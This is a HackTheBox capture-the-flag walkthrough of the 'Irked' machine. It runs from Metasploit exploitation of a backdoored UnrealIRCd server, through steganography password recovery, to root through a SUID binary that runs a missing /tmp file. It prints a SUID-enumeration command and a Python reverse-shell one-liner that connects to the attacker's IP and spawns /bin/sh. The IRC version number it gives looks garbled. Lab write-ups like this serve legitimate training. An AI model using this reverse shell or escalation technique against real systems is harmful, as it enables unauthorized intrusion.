On this HacktheBox walkthrough, we’re going through the ‘Irked’ box. This was a pretty easy box all things considered, but good practice nonetheless. Our initial attack path is through a vulnerable IRC chat server (Internet Relay Chat). We follow this up by exploiting a misconfigured SUID binary to escalate to root privileges.
What we know starting out:
- The IP address of Irked is 10.10.10.117
- It is running some distribution of Linux
- GOAL: To obtain the user.txt and root.txt flags
Step 1: Enumeration
Per usual, we will begin with an Nmap scan. I’ll be doing a full port TCP scan here to make sure we reveal the IRC port that is being used:
We can see that we have 7 open ports to look into. But one that stands out as unique is port 6697, which appears to be running an IRC server. We’ll put that in our back pocket for now and check out the web server:
All that’s here is a silly image though. I tried to brute force some directories and look for any additional functionality but found nothing interesting. So this appears to be a dead-end for now.
Let’s turn out attention back to the IRC server, and see if we can enumerate it any further by logging into it. Kali Linux comes with an IRC client called ‘HexChat’, which we will be using to connect to the server. When you open it up, you’ll have to configure a new server to connect to:
I named our network ‘irked.htb’ and specified the IP address and port as shown in the picture. When we click ‘Connect’ we will be logged into the IRC server, and it will supply us with the program name and version number of the IRC server!
So we now know that this server is running Unreal IRC v18.104.22.168!
Step 2: Initial Shell
Armed with this knowledge, let’s fire up the msfconsole, load the ‘unreal_ircd_3281_backdoor module’, and fire it off:
And just like that we have a shell. Super straightforward and easy. Let’s poke around in the users home directories for anything interesting:
We find a hidden .backup file in “djmardov’s” Documents directory. Catting the file reveals a so-called ‘super elite steg backup pw’
So we have an alleged password for some file concealed via steganography. The only picture that we came across was that silly face on the index page of the web server. Could there be hidden information in that image?
Looking at the source code of the web page, we see that the image is named ‘irked.jpg’. So let’s use wget to download this file off the server:
Now we can use a tool in Kali called ‘steghide’ to extract any potentially hidden data from this image file. Using the man page as a reference guide, we see we need to enter the command as follows:
steghide extract -sf irked.jpg
We’ll be prompted for a passphrase, for which we’ll try the one we found in djmardov’s backup file:
And we see that the following string was hidden within the image:
Going out on a limb, let’s see if this is djmardov’s SSH password:
And it is!
At this point, we have the required permissions to go into the ~/Documents directory and grab the user.txt flag.
Step 3: Privilege Escalation
Let’s check for any easy misconfigurations that we might be able to leverage. A common vector for this is through SUID binaries. We can run the following command to get a list of all SUID binaries:
find / -perm -u=s -type f 2>/dev/null
We know from experience that these are all pretty standard SUID binaries EXCEPT for the ‘viewuser’ one… Let’s see what happens if we run it:
It returns us some output with what appears to be active users and their associated IP addressed. (Looks like I’m not the only one playing on this box at the moment).
But also interesting, is the attempt to execute the /tmp/listusers binary, which can’t be found…
So we have an SUID root binary which is attempting to execute a program that doesn’t exist. All we have to do is create our own ‘listusers’ reverse shell script, and we can have a root shell thrown our way!
Using the Python reverse shell script from Pentestmonkey, let’s throw this into a file named /tmp/listusers, making sure we specify our Kali Linux IP address and listening port:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.25",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Make sure you change the modifications so it is accessible by the calling binary: (chmod 777 /tmp/listusers)
When we check our listener, we see that we caught a root shell!
At this point, we are free to navigate to root’s home directory to grab the root.txt flag
And that’s the box. Thanks for following along everyone. Be sure to check back periodically for new content!